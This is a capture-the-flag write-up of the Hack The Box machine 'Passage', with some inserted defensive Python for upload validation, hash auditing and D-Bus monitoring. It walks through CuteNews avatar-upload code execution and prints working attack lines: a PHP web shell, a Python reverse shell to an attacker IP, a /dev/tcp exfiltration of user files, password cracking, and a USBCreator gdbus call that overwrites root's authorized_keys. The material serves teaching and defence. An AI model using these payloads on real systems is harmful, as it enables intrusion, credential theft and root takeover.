Hack The Box — Passage Writeup

Passage is a medium-difficulty Linux machine that features a news management application called CuteNews. The software is known to be vulnerable to remote code execution, allowing an attacker to gain a foothold on the system via the avatar upload feature. Looking into the software's source files reveals a few password hashes that can be recovered with a dictionary attack. One of the recovered passwords can be used to escalate to the first user, and it turns out that this user shares the same SSH key as the second user. Finally, an unpatched package called USBCreator allows an attacker to perform an arbitrary file write as root without supplying a password.

All my raw HTB notes are available on my GitHub.

Reconnaissance

An initial nmap scan discovers two open ports: SSH on port 22 and HTTP (an Apache web server) on port 80.

mkdir nmap; nmap -sC -sV -oN initial-passage -v 10.10.10.206

As SSH usually requires credentials, I’ll enumerate the web server on port 80.

Enumeration

The page presents a news website called “Passage News”.

The post titled “Implemented Fail2Ban” states that they have implemented Fail2Ban. Knowing this, I will avoid any kind of brute-force attack here.

Inspecting the page source reveals a directory called “CuteNews”. I also find the hostname, passage.htb.

Adding /CuteNews to the URL redirects me to a login page.

I can register as a normal user.

I threw “CuteNews 2.1.2” into searchsploit and it returned several exploits.

searchsploit 'CuteNews 2.1.2'

I’ll go with the ‘avatar’ RCE.

Foothold

It turns out the ‘avatar’ RCE exploit has a CVE assigned. The exploit module description is as follows:

This module exploits a command execution vulnerability in CuteNews prior to 2.1.2. The attacker can infiltrate the server through the avatar upload process in the profile area. There is no realistic control of the $imgsize function in “/core/modules/dashboard.php”. Header content of the file can be changed and the control can be bypassed. We can use the “GIF” header for this process. An ordinary user is enough to exploit the vulnerability. No need for admin user. The module creates a file for you and allows RCE.

I can also exploit this manually.

I still have the payload that I made with exiftool in my previous Magic write-up. If I didn’t have it, I could create a new one by embedding a PHP web shell in the image’s comment field.

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' iamf.jpg

I’ll rename my JPEG image to iamfr.php, and then I’ll upload it as my avatar (Dashboard –> Personal Options).
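The upload step above works because the server only checks that the file content looks like an image, not that its name or extension matches that content. As an added illustration (not code from the CuteNews project or from the original write-up), the following Python models both sides: a header-only check of the kind the module description refers to, which accepts a GIF-headed file regardless of its name, and a hardened validator that additionally requires a single allow-listed extension, a magic-byte match for that specific extension, and a server-generated storage name. The sample uploads, file names and function names are constructed for the example.

```python
import os
import secrets

# Magic bytes for the image types an avatar upload should accept.
JPEG_HEADER = b"\xff\xd8\xff"
GIF_HEADER = b"GIF89a"
PNG_HEADER = b"\x89PNG\r\n\x1a\n"

ALLOWED = {".jpg": JPEG_HEADER, ".jpeg": JPEG_HEADER,
           ".gif": GIF_HEADER, ".png": PNG_HEADER}

# Constructed sample "uploads": a genuine-looking JPEG, the trick from the
# write-up (valid image header, executable extension), a double extension,
# and a plain text file.
SAMPLE_UPLOADS = {
    "photo.jpg": JPEG_HEADER + b"\x00" * 32,
    "avatar_iamf_iamfr.php": GIF_HEADER + b"<?php system($_GET['cmd']); ?>",
    "shell.php.gif": GIF_HEADER + b"<?php phpinfo(); ?>",
    "notes.txt": b"just text",
}


def header_only_check(data):
    """The weak check: accept anything whose first bytes look like an image.
    This is comparable to trusting an image-size probe alone; the file name
    and extension are never consulted."""
    return any(data.startswith(sig) for sig in ALLOWED.values())


def hardened_check(filename, data):
    """Hardened validator. Returns (accepted, detail) where detail is either
    the rejection reason or the server-chosen name to store the file under."""
    base = os.path.basename(filename)          # never trust client paths
    name, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if "." in name:                            # reject shell.php.gif style names
        return False, "multiple extensions"
    if not data.startswith(ALLOWED[ext]):      # content must match THIS extension
        return False, "content does not match extension"
    # The stored name is generated server-side, so the client cannot choose it.
    return True, "avatar_" + secrets.token_hex(8) + ext


def evaluate_samples():
    """Run both checks over the constructed uploads; returns
    {filename: (weak_result, hardened_result)}."""
    return {
        fname: (header_only_check(data), hardened_check(fname, data)[0])
        for fname, data in SAMPLE_UPLOADS.items()
    }


if __name__ == "__main__":
    for fname, (weak, hard) in evaluate_samples().items():
        print(f"{fname:24} header-only={weak!s:5} hardened={hard}")
```

Even with the hardened check, the upload directory should be served with script execution disabled (for Apache, a directory-level rule that refuses to hand `.php` files to the interpreter), so that a file which slips through validation is still returned as static content rather than executed.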

The image is located at http://passage.htb/CuteNews/uploads/avatar_iamf_iamfr.php

I’ll send a Python reverse shell through the web shell and capture it on my nc listener.

http://passage.htb/CuteNews/uploads/avatar_iamf_iamfr.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.31",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

I have an interactive shell now.

Privilege Escalation

There are two users in the home directory.

In /var/www/html/CuteNews/cdata/users, I find a number of PHP files containing base64-encoded data. Some of the files also contain PHP tags.

I’ll send those files to my machine as one file using cat and the /dev/tcp trick.

www-data@passage:/var/www/html/CuteNews/cdata/users$ cat *.php > /dev/tcp/10.10.14.31/9000

I redirected it to a file called cdata.users.

I can perform a bulk decode on the file contents after removing the PHP tags.

cat cdata.users| sed 's/<?php[^>]*>//g' | base64 -d

And that was a mess.

Among those outputs, this one is of particular interest.

"pass";s:64:"b2cf7db7a51da35f8fa412f47f16cfea46090b75e399fde5ec6a0ec90250df52"

hash-identifier identifies it as SHA-256.

It turns out that those exfiltrated files are how CuteNews stores its database: a flat-file database, similar in spirit to /etc/passwd.

Knowing that, I can add another filter using grep to grab the password hashes.

cat cdata.users| sed 's/<?php[^>]*>//g' | base64 -d | grep -o -E -e "[0-9a-f]{64}"
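The sed | base64 -d | grep pipeline above is fine interactively, but it loses which account each hash belongs to and says nothing about the storage scheme. As an added example (not code from the write-up or from CuteNews), the Python below performs the same decode over a constructed cdata-style file, pairs each account name with its stored hash, and then audits whether any stored value is simply an unsalted SHA-256 of a weak candidate word, which is exactly the property that makes the later hashcat run feasible. The record layout, account names and passwords are all constructed for the example; the PHP die() guard line mirrors the tags the sed expression strips.

```python
import base64
import hashlib
import re

# Strips "<?php ... ?>" guards, like the sed expression in the write-up.
PHP_TAG = re.compile(r"<\?php.*?\?>", re.DOTALL)
# Pulls the account name and the 64-hex "pass" field out of serialised PHP.
PASS_FIELD = re.compile(
    r'"name";s:\d+:"([^"]+)".*?"pass";s:64:"([0-9a-f]{64})"', re.DOTALL)


def _make_record(user, password):
    """Build one constructed cdata-style user file: a PHP guard line followed
    by base64 of a serialised PHP array holding the name and SHA-256 of the
    password (unsalted, which is the weakness being audited)."""
    h = hashlib.sha256(password.encode()).hexdigest()
    serialised = ('a:1:{s:%d:"%s";a:2:{s:4:"name";s:%d:"%s";s:4:"pass";s:64:"%s";}}'
                  % (len(user), user, len(user), user, h))
    return ("<?php die('Direct call - access denied'); ?>\n"
            + base64.b64encode(serialised.encode()).decode() + "\n")


# Constructed sample standing in for `cat *.php` over the users directory.
CONSTRUCTED_CDATA = _make_record("alice", "Winter2020!") + _make_record("bob", "summer")


def decode_cdata(text):
    """Remove PHP tags and base64-decode every remaining chunk; chunks that
    are not valid base64 are skipped instead of aborting the whole run."""
    decoded = []
    for chunk in PHP_TAG.sub("", text).split():
        try:
            decoded.append(base64.b64decode(chunk, validate=True).decode("utf-8", "replace"))
        except ValueError:       # binascii.Error is a ValueError subclass
            continue
    return "\n".join(decoded)


def extract_hashes(text):
    """Return {account: sha256_hex} for every record found."""
    return {user: h for user, h in PASS_FIELD.findall(decode_cdata(text))}


def audit_unsalted(hashes, candidates):
    """Report accounts whose stored value equals the unsalted SHA-256 of a
    candidate word. Any hit shows the storage scheme offers no protection
    against a plain dictionary attack; a salted, slow hash (bcrypt, scrypt,
    Argon2) would not match a precomputed table like this."""
    table = {hashlib.sha256(c.encode()).hexdigest(): c for c in candidates}
    return {user: table[h] for user, h in hashes.items() if h in table}


if __name__ == "__main__":
    found = extract_hashes(CONSTRUCTED_CDATA)
    for user, h in found.items():
        print(f"{user}: {h}")
    print("weak:", audit_unsalted(found, ["password", "summer", "letmein"]))
```

The same audit applies to any flat-file store: if a stored credential can be matched by hashing a wordlist once with no per-user salt, the only real defence is to migrate to a salted, work-factor hash and require users to reset.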

hashcat recovered five passwords.

./hashcat.exe -m 1400 hashes/passage.hashes ../rockyou.txt -O 

I tried to spray the passwords against SSH, but it only accepted key authentication. I tried again with su, and the password atlanta1 worked for paul.

Escalating from paul to nadav is straightforward: user nadav uses the same SSH key pair as user paul.

So I can just SSH from paul to nadav.

Since nadav is a member of the sudo group, I can just type sudo su to escalate to root, but unfortunately it requires nadav’s password.

So I looked around nadav’s home directory and found a .viminfo file. The file contains the following information.

The history of files points to these two configuration files:

  • /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
  • /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf

51-ubuntu-admin.conf defines only two groups, sudo and admin, that can satisfy a request for administrator authentication. This file is used by Polkit, which lets unprivileged processes ask privileged ones to perform actions. In the GUI, the prompt that asks for a password when performing an administrative task is Polkit at work.

I don’t fully understand com.ubuntu.USBCreator.conf in depth. What I know is that this configuration file belongs to a D-Bus service called “com.ubuntu.USBCreator” that runs as root. Who may invoke the methods on this service is constrained by PolicyKit/Polkit: anyone in the sudo or admin group, as defined by the 51-ubuntu-admin.conf file.

From here, it looks like only nadav can invoke the methods of this service.

There is published research on a vulnerability in the USBCreator D-Bus interface that can be used for local privilege escalation. The research summary is as follows:

A vulnerability in the USBCreator D-Bus interface allows an attacker with access to a user in the sudoer group to bypass the password security policy imposed by the sudo program. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root — without supplying a password. This trivially leads to elevated privileges, for instance, by overwriting the shadow file and setting a password for root. The issue was resolved in June when Ubuntu patched the relevant packages in response to a vulnerability disclosure from Unit 42.

The bug was first reported in 2016, and the affected Ubuntu version is 16.04.

The current machine is not an exact match, but since the vulnerability was only patched in 2019, this version may be affected too.

nadav@passage:~$ uname -a
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Sun Sep 6 14:31:10 UTC 2019

One of the tools the researcher used to exploit the vulnerability is a CLI tool called gdbus.

As nadav, I can try to overwrite the contents of root’s authorized_keys file with my public key.

I’ll put my public key named key in /dev/shm/, and then I’ll invoke the following command:

nadav@passage:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /dev/shm/key /root/.ssh/authorized_keys true
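The method call above is the thing a defender would want to see in telemetry: USBCreator’s Image method is meant to copy an image onto a removable block device, so a call whose target is a regular file under /root or /etc is abuse by definition, whoever the caller is. As an added example (not code from the write-up or from the Unit 42 research), the Python below parses text in the shape printed by `dbus-monitor --system` and flags Image calls whose target is not a block device path. The sample monitor output is constructed to match the gdbus call shown in the write-up plus one legitimate-looking call; the exact argument order (source, target, boolean) follows the gdbus invocation above.

```python
import re

# Constructed sample, modelled on the line format printed by `dbus-monitor --system`:
# one "method call ..." header per message, then one indented line per argument.
SAMPLE_MONITOR_OUTPUT = """\
method call time=1600000000.123456 sender=:1.95 -> destination=com.ubuntu.USBCreator serial=2 path=/com/ubuntu/USBCreator; interface=com.ubuntu.USBCreator; member=Image
   string "/dev/shm/key"
   string "/root/.ssh/authorized_keys"
   boolean true
method call time=1600000001.000000 sender=:1.96 -> destination=com.ubuntu.USBCreator serial=3 path=/com/ubuntu/USBCreator; interface=com.ubuntu.USBCreator; member=Image
   string "/home/user/ubuntu.iso"
   string "/dev/sdb"
   boolean false
method call time=1600000002.000000 sender=:1.97 -> destination=org.freedesktop.DBus serial=4 path=/org/freedesktop/DBus; interface=org.freedesktop.DBus; member=Hello
"""

HEADER = re.compile(r"^method call .*?sender=(?P<sender>\S+) .*?interface=(?P<iface>[^;]+); member=(?P<member>\S+)")
STRING_ARG = re.compile(r'^\s+string "([^"]*)"')

# A legitimate Image target is a block device node; /dev/shm is a tmpfs, not a device.
BLOCK_DEVICE = re.compile(r"^/dev/(sd[a-z]+\d*|nvme\d+n\d+(p\d+)?|mmcblk\d+(p\d+)?)$")


def parse_calls(text):
    """Turn monitor output into a list of {sender, interface, member, strings}."""
    calls = []
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            calls.append({"sender": m.group("sender"), "interface": m.group("iface"),
                          "member": m.group("member"), "strings": []})
        elif calls:
            a = STRING_ARG.match(line)
            if a:
                calls[-1]["strings"].append(a.group(1))
    return calls


def flag_suspicious_image_calls(text):
    """Return a finding for every USBCreator.Image call whose second string
    argument (the target) is not a block device path."""
    findings = []
    for call in parse_calls(text):
        if call["interface"] != "com.ubuntu.USBCreator" or call["member"] != "Image":
            continue
        if len(call["strings"]) < 2:
            continue
        source, target = call["strings"][0], call["strings"][1]
        if not BLOCK_DEVICE.match(target):
            findings.append({"sender": call["sender"], "source": source, "target": target,
                             "reason": "Image target is not a removable block device"})
    return findings


if __name__ == "__main__":
    for f in flag_suspicious_image_calls(SAMPLE_MONITOR_OUTPUT):
        print(f"ALERT sender={f['sender']} {f['source']} -> {f['target']}: {f['reason']}")
```

The sender field is a unique bus name, not a user; in a real deployment the detector would resolve it to a process and uid (for example through the bus’s GetConnectionUnixUser method) and pair the alert with a file-integrity watch on /root/.ssh/authorized_keys and /etc/shadow. The durable fix remains installing the patched usb-creator package.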

I tried to log in as root using my private key, and it worked.

ssh -i root_rsa root@10.10.10.206

Originally published at: https://fahmifj.github.io/writeups/hackthebox/htb-passage/

I mostly write about CTF solutions and other IT related stuff that others might find useful | Partially moving to: https://fahmifj.github.io
